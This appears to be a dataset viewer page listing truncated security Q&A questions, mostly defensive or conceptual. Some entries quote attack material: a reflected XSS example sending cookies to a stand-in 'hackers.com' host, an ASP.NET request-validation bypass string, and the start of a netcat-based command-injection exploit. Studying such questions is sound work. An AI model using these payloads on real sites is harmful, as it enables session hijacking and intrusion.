instruction stringlengths 24 29.9k |
|---|
I have a malware problem similar to the one described here and here
and I'm looking for information on how to remove it. Spybot Search and Destroy and Malwarebytes Antimalware both give my computer a clean bill of health now. However, when I first encountered problem, a Spybot scan would say there were 4 problems it co... |
I have a SMB (small-to-medium-business) router (router x) that my workstations run off of in my small business. I wanted to offer my customers wireless internet while they wait for service so I installed an extra wireless router (router y) laying around at home. I plugged router y into router x so router x with IPs on ... |
Computer World is reporting that Android devices phoning home have given Google a database with almost every wifi password in the world to it. Is this groundless hysteria, or a genuine concern?
If this is a legitimate report, short of banning android from my network is there a simple way to keep my password private?
|
KeePass is an application that keeps all your passwords for you in a database. It is primarily protected by a master password and/or keyfile. If the database is properly encrypted with that password this can be quite secure.
There is a plugin OtpKeyProv that supposedly increases security by adding a second authenticati... |
We have this web-application with high valuable (business) data.
All communication is encrypted through TLS/SSL. While I consider this a really safe protocol, it can still be compromised if someone managed to install a malicious CA-Certificate my computer.
Since we have the infrastructure, we would like to strengthen t... |
What steps does a Tor user need to take to ensure that he or she doesn't become implicated in other Tor users' criminal activity?
For example, I recently came across a Tech Republic article by Patrick Lambert saying that acting as a relay is dangerous:
You may want to act as a relay yourself. This will allow other peo... |
I would like to know if there is any way to demonstrate how an attacker may attack the integrity of a website due to an unencrypted connection and how SSL will avoid this.
For the aspect of confidentiality, the following example explains:
When an unencrypted connection is made to a website, an attacker use a packet sni... |
I have some questions concerning how GnuPG operates when encrypting and signing messages.
By default:
Which cipher and mode-of-operation is used for symmetric encryption?
What encryption scheme is used for the encryption of the session key?
Which hash function and signature scheme is used in a signed message?
|
I am in a process of enforcing more strict VPN access policy after learning about the attack on PPTP with MSCHAP v2. Basically this I will be disabling the traditional PPP authentication methods and using an EAP method instead.
Windows provides quite a range of EAPs, among them EAP-MSCHAP v2. Am I correct to understand... |
This is a sister question of Is EAP-MSCHAP v2 secure?.
Based on my understanding, IPsec should have authenticated the server (we're using PKI) and secured the rest of the protocols before the user authentication takes place, so there's no need to use PEAP (for L2TP/IPsec) right? (I.e. plain MSCHAPv2 should provide adeq... |
I know that a reflected XSS can be done with a GET request like:
http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script>
As long the response looks similar to this:
<html>
<head>
<title>Your Serach Results</title>
</head>
<body>
<h2>No resu... |
Okay so I was setting up stuff on my new mac earlier, downloading flash and office. They both downloaded and installed smoothly, but after I noticed a weird new file in my 'downloads' folder:
jed+ZXlW.exe.part
I realize I'm on a mac, that that is an exe, and that it's an incomplete file, but I'm still wondering how it ... |
Hello I am looking for some advice. For an Advanced C++ Programming Course I am taking another student and doing a project. For this project we plan on using a MySQL Database as our backend database.I would like to setup a remotely accessible MySQL Database that we can use for the project such that we can be using the ... |
If a desicion is to be be made on selecting a mode of fail for an inline IPS that is protecting servers, what are the criteria that should be considored for selecting one of the failure modes:
1- Fail close: if the IPS fails, it will disconnect the server it is protecting.
2- Fail open: if the IPS fails, it will pass t... |
I downloaded a zip file, with vb files inside. If by any chance, it contains a virus, or a source code to have access to my computer, what should I do? I removed the zip file and the folder extracted, empty the trash, and reboot my computer. I have seen once that one can enter a computer just by downloading a file, is ... |
I read from a link that says:
Trusted Boot takes over where Secure Boot leaves off. The bootloader verifies the digital signature of the Windows 8
kernel before loading it. The Windows 8 kernel, in turn, verifies every other component of the Windows startup process,
including the boot drivers, startup files, and E... |
Tunnelbear is a VPN with an easy interface to choose your country IP -
https://www.tunnelbear.com/
On installation it installs a network service.
When the app is turned off would it be able to access any passwords etc? I dont know what the network service does or can do.
When using the VPN is it secure to use passwor... |
These are things I do when users submit data:
substr if extra characters found.
htmlspecialchars() + ENT_QUOTES + UTF-8
str_replace '<' '>' in user input
What more things need to be done?
|
In Information and IT Security there is a nasty tendency for specific "best practices" to become inviolable golden rules, which then leads to people recommending that they are applied regardless of whether they are appropriate for a given situation (similar to Cargo Cult Programming)
A good example of this is the commo... |
FileVault has the functionality to both allow and disable user accounts from booting up the encrypted drive. Reference: this cnet article. See also the stack exchange question How does FileVault 2 work with multiple decryption keys?.
In this model (master key stored encrypted on the recovery drive for each account), wh... |
Can somebody explain the different steps to produce a heapspray attack (what are the needed vulnerabilities in the targeted software, what are the limitations of such technique, how to proceed, ...) and how to render it as reliable as possible ?
|
I have two online accounts from different banks, one bank expires my session faster than the other, it's quite annoying.
I was wondering how long (or short) should a session be for it to be considered safe enough but not annoying?
|
This is my first question here on the IT Security section of Stack Exchange, so if there is any problems with my question I apologize.
Basics
Suddenly Google says that my website contains Malware!
When I enter my website my antivirus program tells that a Trojan has been blocked and removed! The Trojan is categorized a... |
OK, so here goes after a lot of trial and error:
background: My client recently took over another firm. However, apparently the administrator passwords to the server (along with some other non-IT stuff) hadn't been passed on. And now i'm charged with the task of re-gaining administrator privileges.
So, we have multiple... |
I've identified an XSS in a client's application where they've failed to properly sanitize a variable. The application, however, is written in ASP.NET 2.x and they have request validation turned on.
I'm aware of the below string, which will bypass request validation and work on IE:
‹%tag style="xss:expression(alert(123... |
This trick to hack windows and reset passwords(or create new logins)has been around for ages and still works on windows 7 and windows 8. Is there any way to disable the key combination that brings up the 'Ease of access' dialogue box WindowsKey+U?
I've got other safeguards in place like full disk encryption and a lock... |
I got a box I am trying to pop (boot and root) that has an upload form on its website for logged in users that will take a .gzip file and extract it to the users home directory on the server. I am thinking that I might be able to exploit that does anybody know of a way to possibly make a .gzip file with malicious code... |
I need to go through airport security and customs, and its known that at least the German customs (http://en.wiktionary.org/wiki/Bundestrojaner) (and I suspect others as well) try to upload software to the system.
So here my question:
How can I make sure that nobody tempers with my system while I do not have physical a... |
On the project that i'm currently working, we authenticate the
clients by username and password. In this system each user has a key which is calculated from his password.
However, we want to provide an API access for the users where they will be
authenticated with an oath 2.0 token. So the problem that I'm facing is t... |
I am exploring a vulnerability in one PHP website that is basically riddled with SQL injections. With SQLMap, I managed to dump all the tables and get some basic information (username, DB name, hostname, though the it seems pretty useless because the DB server is not externally available). My goal is to modify data in ... |
I have a really simple high interaction honeypot and I have just installed a VM as an IPS (suricata) with a transparent bridge between my router and the honeypot. The setup looks something like this:
[Router] <----> [ IPS ] <-------> [ Honeypot ]
My problem is that most of the IPS rule sets out there are designed ... |
Sometimes it happens that I have to access my email or some other web service from public machines. Are there any options to make it secure or at least reduce risks to acceptable levels? I am most worried about keyloggers. But even if can copy-paste password from somewhere there are still tools to intercept that. So th... |
Is it PCI compliant to generate a token for every card used for processing, regardless of whether the client asked for his card to be saved or not?
|
I found this in wiki
The Finite Field Diffie-Hellman algorithm has roughly the same key strength as RSA for the same key sizes. The work factor for breaking Diffie-Hellman is based on the discrete logarithm problem, which is related to the integer factorization problem on which RSA's strength is based. Thus, a 3072-bi... |
I want to only white-list applications that can run on my system using Apparmor, I know it is used to confine applications/programs based on their path names, but what I need is to contain those applications to run in confinement, and everything else is black-listed .. Can I do that in Apparmor, or I'm talking about th... |
We're all aware of the need for physical security. Everytihng from locks on doors to locking your computer when you leave it.
I'm having trouble with some people leaving their stations up as they head away from it. I can mess with settings like timeouts but then it sometimes times out while they're reading etc... Any ... |
The question may need to be reworded.
The server-side is set up with Squid3 acting as an Authenticating proxy by way of LDAP. I did this for testing purposes to make sure everything was working.
I would like to have the client-side authenticate using something like a certificate or the like so that the need to physica... |
I write mobile application and I need to authenticate users against server. Server's side is written in php. I can't use cookies to store SID (Session ID), so I decided to send it at every request using GET method.
Later on, I decided that sending the same SID everytime is not secure enough, so I decided to use new str... |
In Software Assurance class I was asked a question why following query allows SQL injection which will allow log in into unsafe phpBB version but will not allow any modification of the database.
We prepared our VM's with PHP with disabled magic quotes to allow this kind of abuse. Otherwise, this would not work. We also... |
Preface
My mobile app allows users to create accounts on my service. In addition to being able to log in with external authentication providers, like Facebook, I want to give the user the option to create an account using an e-mail address.
Normally, all calls to my web service are authenticated via basic authenticatio... |
I want to detect my website visitor's using any duplicate proxies ?
If so how to avoid them? also how to identify the proxy is an HTTP proxy or a SOCKS proxy ?
|
Covert channels are normally used for communicating illegally or for some hidden communications, but I am trying to figure out what covert channel algorithms might be.
Has anyone heard of this term before and what does it mean?
How covert channel algorithms could be implemented in non-Computing environments?
|
With SELinux developed by NSA and AppArmor by Novell [*], what alternate solutions exists when trying to lock down a system and running applications, based on ACL and similar concepts like Zones on Solaris.
with applications i mean: services that are available and public accessible via network, namely all kinds of web... |
I need to sniff WiFi packets, but according to AirPcap FAQ page, it just supports Microsoft Windows, not other platforms. Does any alternative of this product work in Linux?
Please don't offer Alfa WiFi Adapter, because it cannot receive some packets!
|
I have a NAS containing media and user files encrypted on disk. I will be running FreeNAS 9.x as my operation system, OwnCloud and SABnzbd "in jail". OwnCloud will use SSL, of course. I also have a HTPC (Home theater PC) on my network, that runs MediaPortal and will be accessible from the Internet using AMPdroid.
I wo... |
I have been thinking about this subject a lot. Exploit Development is nearly the same as normal development, you need to test quite a lot of platforms (eg. Windows XP, Windows Vista, x64, x86, Chinese, English versions). This problem asks for unit tests and continuous integration.
Till now I've been hacking some Python... |
Assume that party 1 and party 2 each possess a key used for AES encrypting data. Assume that the key was properly randomly generated and securely passed between them.
Now I need a way for party 1 to tell party 2 which stored key to use. I was thinking of simply creating an SHA1 hash of the key and sending that with the... |
I have a php application and somethings related to the application need changes to vhost.conf file.
Presently i'm making the changes manually. But i would like to automate it using a php script.
Is this advisable? I want to know the security complications involved.
|
I'm coding an exploit in python that exploits a command injection vulnerability for a CTF and I'm wondering how could I start a netcat listener and then send the payload to the remote host and once the connection is stablished the script execution finishes and drops me to the stablished connection.
This is my code:
url... |
I'm using Apache Tomcat 7 to run my webapp on Linux. I scanned it by Acunetix and it's telling me that my webapp is vulnerable to "Slow HTTP Denial of Service Attack". How can I protect it?
Acunetix is reffering me to here, but it's about securing Apache, not Tomcat.
|
I'm currently researching DDoS attacks for an article I'm writing and apart from the obvious lack of availability of the target host and their services, is there anything else a DDoS can help accomplish?
I'm thinking things along the lines of a DDoS being the first step for a larger intrusion or compromise. Does it mak... |
I am having a debate with a coworker about whether our site is vulnerable to CSRF attacks. He is saying that since we are using RESTful AJAX requests for everything that CSRF is not possible. Say a request to update your account info looks something like this:
POST /ajax/account/savebasic HTTP/1.1
Host: www.mysite.co... |
I recently joined a company with a million+ lines-of-code PHP app. The security approach to XSS appears to be to filter output whenever the dev thought of it. Not surprisingly, they didn't catch everything, and we've got some real doozy XSS opportunities.
In a past life I've used the approach Rasmus advocates: filter... |
I have an application that sends username and a password by email (random temporary password, mandatory change on first login).
A big customer has this policy of "never send username and password in the same message" - and they are demanding a change in order to split it in two email messages, one containing the userna... |
Nowadays I heard that some cheaters make mobile calls to steal banking & other private information.They show private numbers like 911 to their victims.
Is it possible show different number to victim when calling another mobile phone.?
Is it possible by using a program or by any other means?
|
I'm having trouble understanding AES and would like to know if encrypting the same text with the same key two times in a row should give the same output.
Is there any salt or something that would change the ouput?
If it doesn't give the same thing, how could one decrypt the message (with the key) if the salt is random ... |
Context: SAML2 Web Browser SSO profile. (HTTP POST binding). Federated SSO.
If the IdP gets an <AuthnRequest> from the SP, should / must / can the IdP do the user authentication first, or read/validate the <AuthnRequest> first?
(the implementation we have in mind could be based on IBM's WebSeal and TFIM... where it see... |
How can i remotely destroy all the data from a laptop having windows 7 as the OS? Is there a way to do that?
|
The man page for access(2) tells :
Warning: Using access() to check if a user is authorized to, for example, open a file before actually doing so using open(2) creates a security hole, because the user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the us... |
iOS version 5 and newer has a setting for VPNs to "Send All Traffic" over that VPN. I think that sending all data to a trusted VPN target would ensure privacy of all communication sent over that WiFi link, and also prevent disclosure of HTTP cookies.
How effective or reliable is that setting in protecting a user's tr... |
A client of ours wants us to host a blob of Javascript for their custom-branded version of our website. It is hosted on a subdomain of our site (customer.example.com), but uses the same cookie domain as our primary site (example.com).
What are the security implications of doing this, should we agree?
|
I'm not much of a ipsec initiate, so this is a bit over my head ... but I'm always willing to learn more.
Are there any known attacks against OATH TOTP (Google Authenticator's / Authy's algorithm) if an attacker has an (unspecified) number of previous one-time passwords, as generated by the app?
Or, to put it another w... |
We will be getting some data that needs to be kept in accordance with USGCB regulations. Our intent was to keep it secure by storing and using it on a non-networked computer, but the regulations seem to require a network connection, as they specify keeping the OS and virus scanner up to date. Surely there is a clause s... |
If I encrypt 160 bits (20 bytes) of data using an RSA 1024 private key, will the result always be 128 bytes? This seems to be the case in my experiements, but I want to be sure.
For example,
/bin/echo -n "foo" | openssl dgst -sha1 -sign privateKey.der -keyform DER > enc.txt
always seems to result in a 128 byte file en... |
I'm just wondering if there is any way to uniquely identify or tag client devices like laptops and towers in order to whitelist them for vpn access.
(Note: This is a thought-experiment at the moment, but I hope I can implement this at some point). Please also note that I don't have much experience with VPNs.
Here's wha... |
During the handshaking of an SSL connection, the server sends its public key, the client generates a random password, encrypts it with the pk, and sends it back, then the server decrypts it and all is well.
But, given that all (as far as I know) psuedo random number generators use the current time for the seed, given a... |
What is this pattern for mobile authentication called? It's more convenient than entering complex password on mobile phone, and I wanted to read about it more
A user is authenticated within webapp and he wants to bind his mobile app with his account
He uses his mobile app to scan QR code containing key K
And chooses P... |
I'm working on a PHP application.
There is a requirement to find IP's by hostname and i have to resort to gethostbynamel for that.
Looks like there is no other way.
I was wondering if there are any security implications related to this.
I am validating the hostname given as input from end-user by using regular expressi... |
I prefer bcrypt because it uses a lot of "power" to decrypt.
But which encryption can i use that is most likely safe for NSA (which knows a lot of backdoors) and is relatively slow to decrypt.
I know RSA advised against their default encryption, which is developed partially by the NSA, here are other "unsafe" encryptio... |
iOS7 includes iCloud Keychain which syncs your stored passwords across devices. Not only that but it also syncs credit card numbers.
The only information I can find about encryption is that they are encrypted with AES-256, with is symmetric key encryption. Given these facts it would seem like it actually will give cred... |
I am testing a router for vulnerability, and I've noticed an interesting anomaly. It isn't the first time I noticed it, either. When entering the right PIN, Reaver will return with a different PSK and SSID each time. However, none will ever work. Here's an example of output:
~$ reaver ...
[+] Waiting for beacon from xx... |
I fail to grasp the necessity of using concept of owner (ownership) and find clear explanation of its necessity.
What cannot be done without concept of owner(ownership) in filesystem/database object security (permissions) systems? Or, why is it needed?
Update:
I would highly appreciate if you help me understand why ... |
I'm looking for file system with reasonably error corrections, but rugged against forensic after wipe.
Say, encrypted container via loop mounted like ext4 - journal file system. This is good performance and secure in many ways.
Wiping in this scenario is a destroying at least start of crypto-container(journal of ext4)... |
What can be done to bridge the Air Gap, except autorun?
Is there any hardware butterflies that can attack physically isolated Unix/Linux machine in common usb drives, like VSC (Vendor Specific Commands)?
http://www.recover.co.il/SA-cover/SA-cover.pdf
|
The major problem with biometric methods of identification is that they are
impossible to revoke. Once my fingerprint, under whichever form, is stolen, I can't put it on a worldwide revocation list, as doing so would block both malicious use and my own legitimate use.
Looking at how easy it is to make a false fingerpri... |
I'm trying test password strength in one of our e-commerce sites. I'm using john the ripper to brute-force a password file. The algorithm used by PHP is:
$hash = md5($salt . $pass)
No other transformation is performed nor in the $salt or in the pass, I've manually checked one example. I've found in the documentation t... |
If I have a cryptosystem built around PGP/GnuPG, I can keep my secrets safe by using an OpenPGP smart card and storing my private keys there. If I'm instead using DJB's NaCl, is there any sort of programmable smart card that I can use to store my private keys and also the NaCl code that operates on them?
I've read abou... |
Is there any way to hide a computer on LAN? For example maybe with a firewall, when someone is going to ping a machine, it won't answer. In other words the machine must answer to router only.
I am the network administrator. The switch hasn't VLAN. I use Linux (Debian)
My topology is this one:
|
What work has been done on fuzzing of the PDF file format? I'm looking for work that focuses specifically on PDF, and is aware of the PDF file format. Has there been past work that builds format-aware tools for fuzzing PDF? Perhaps format-aware mutational fuzzing or generational fuzzing? And are any of the tools or... |
Is it possible to determine the difference between a VPN on port 443 compared to standard SSL traffic?
In order to access SSL websites you need port 443 open but if you setup a VPN Service on port 443 you can dial out of the firewall.
|
I programmed an application on Linux using C, I added an authentication and cryptography layer that's going like this :
1 -client sends connection request. -server send a random challenge to client. -the client adds a salt to the challenge and hash it using SHA1 then sends it. -the server adds the same salt and hash th... |
I keep getting messages that my sign in to my gmail account has failed. I am not trying to get into my account. I did go in and change my password this morning because of that. What do I do now? I would guess it has been at lest 10 times.
|
What could attacker do with stolen private keys of main nodes?
Tor is based on 10 main nodes: moria1, tor26, dizum, Tonga, etc.
IP Addresses of this nodes hard-coded into client.
./src/or/config.c:
static void
add_default_trusted_dir_authorities(dirinfo_type_t type)
{
int i;
const char *authorities[] = {
"moria... |
Can't see how they find this over the web. I'm on Windows, its in my network config. It changes when I use a VPN provider, but not when I use a local socks proxy connected to a remote server over SSH (ProxyCap). None of the publicly available sites are finding my correct IP, but leaktest finds my ISP DNS.
I imagine ... |
I am in the process of developing a php/mysql based web application. I took the complicated route and rather than to use a framework or anything I built the entire foundation of my app from scratch. This all while I learned how to REALLY code (I knew very little, now I'm quite advanced. But faaar from expert or profess... |
I've read this post at length, but I believe this question is subtly different.
Consider this scenario: a municipal, non-profit organization has a website with authentication (username, password). The authentication protects user data; money is not involved (if that matters).
With the best intentions, Person A publishe... |
Suppose if I have a truecrypt container who's main password is 20+ characters long and say, I use three random pictures as a keyfiles. It seems this way I could even use five keyfiles at random but what's the advantage of using them?
Isn't it just using one key file would be sufficient for improving security of passwor... |
How do you tell encryption algorithm used by reading its output? Here is the one I am trying to figure out
Åbd$ý H5ù//°t¬Û)LbÒö©ÂO�…9#x<2L#š÷EaK§èìk¼ïö«��bu]÷ÌL~ž“s�O3¬ø2œ&@é(bÜ„Àð¶‚¢‘ÙÙÿ{@ÀÖÃ6æß*=Ž;i<Ò‹aôê-.[0lk
|
I want to write a functional specification for CC EAL1 evaluation, There is an example in CC part 3 document but it is not enough complete, Are there any template or sample of a functional specification for CC EAL 1 ?
|
In this iteration of the OWASP top 10 application security vulnerabilities list (https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project), a new category 'A9 Using Components with Known Vulnerabilities' has been introduced. This appears to require the investigation of all libraries and imported code in any appli... |
So I was just thinking about token_authenticatable setup from devise (rails gem), and this thought occurred to me:
Could we strengthen web security by hashing username/password with javascript before sending it to the server?
Obviously we should always use SSL, but even SSL is vulnerable to MITM attacks, wouldn't it be... |
If I provide SSH access to users who has paid webhosting service, what security measures should be applied ?
What I can think of:
SSH keys RSA of 4096 size (shall be secure for a while)
Apache MPM-ITK (separating each domain/subdomain) via separate user/group according to business (who paid for which service)
Permissi... |
Currently I'm using KeePass as my sensitive data manager.
I use just a main password to encrypt the database, but it is not very secure: 9 characters, lower letters and numbers mix with no meaning. Something like bwkvu5m8i
I want to increase the security of the database, without sacrificing usability much.
The only add... |
I have an e-commerce website with a REST backend and a Single page JS as front end.
I intend to secure my REST backend with OAuth2.
I don't want to oblige the user to authenticate when he first comes on the website, because as a e-commerce website, it is normal for the user to navigate to see the products, etc (maybe I... |
We have a public website for employees which has access to some sensitive company information. To make the login process more secure we want to implement TOTP. The setup and implementation has been quite straight forward. What I'm not clear on is the best way to store the seed for each user.
It obviously can't be salte... |
I am wondering, why in cake php framework, they include default values for this variable:
salt
cipher seed
I found these default values while doing application review (white box approach). And I found out that the developer didn't modify these values.
CMIIW, if the developers didn't modify these values, it is more ... |
I was searching for the current status of iPhone security: there are many discussions on the subject but a lot of them are mostly hand-waving or related to old bugs/iOS weaknesses.
How secure an iPhone (4S+, iOS6+, 4 digits PIN, wipe after 10 unsuccessful attempts) is against dedicated attacks on data at rest (typical ... |
How data can be modified in a man in the middle attack? is there any video demonstrating that,any how to guide,i need practical material ,i have used cain and abel,ettercap but now i am strucked i don't know how to move furthur.
I am able to see the packets but, how do i modify them.please help me.
Note:-I am working... |
So basically I need to know is there any way to find a connection (or relation) between packets sent by my VMs and my host machine.
In my lab I have lots of workstations, each running a VirtualBox with network adapter bridged to the host adapter (eth0 or wlan0). Each virtual machine has a malformed MAC and of course di... |
Given an HTML file, the content of which was generated from various websites, it could have potential security problems, like:
<script>alert("XSS alert!")</script>
Q: What can we do to "clear" this HTML file? Run a:
sed '/<script/d'
several times? (the "<script" could be hidden in HTML, like: "<script")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.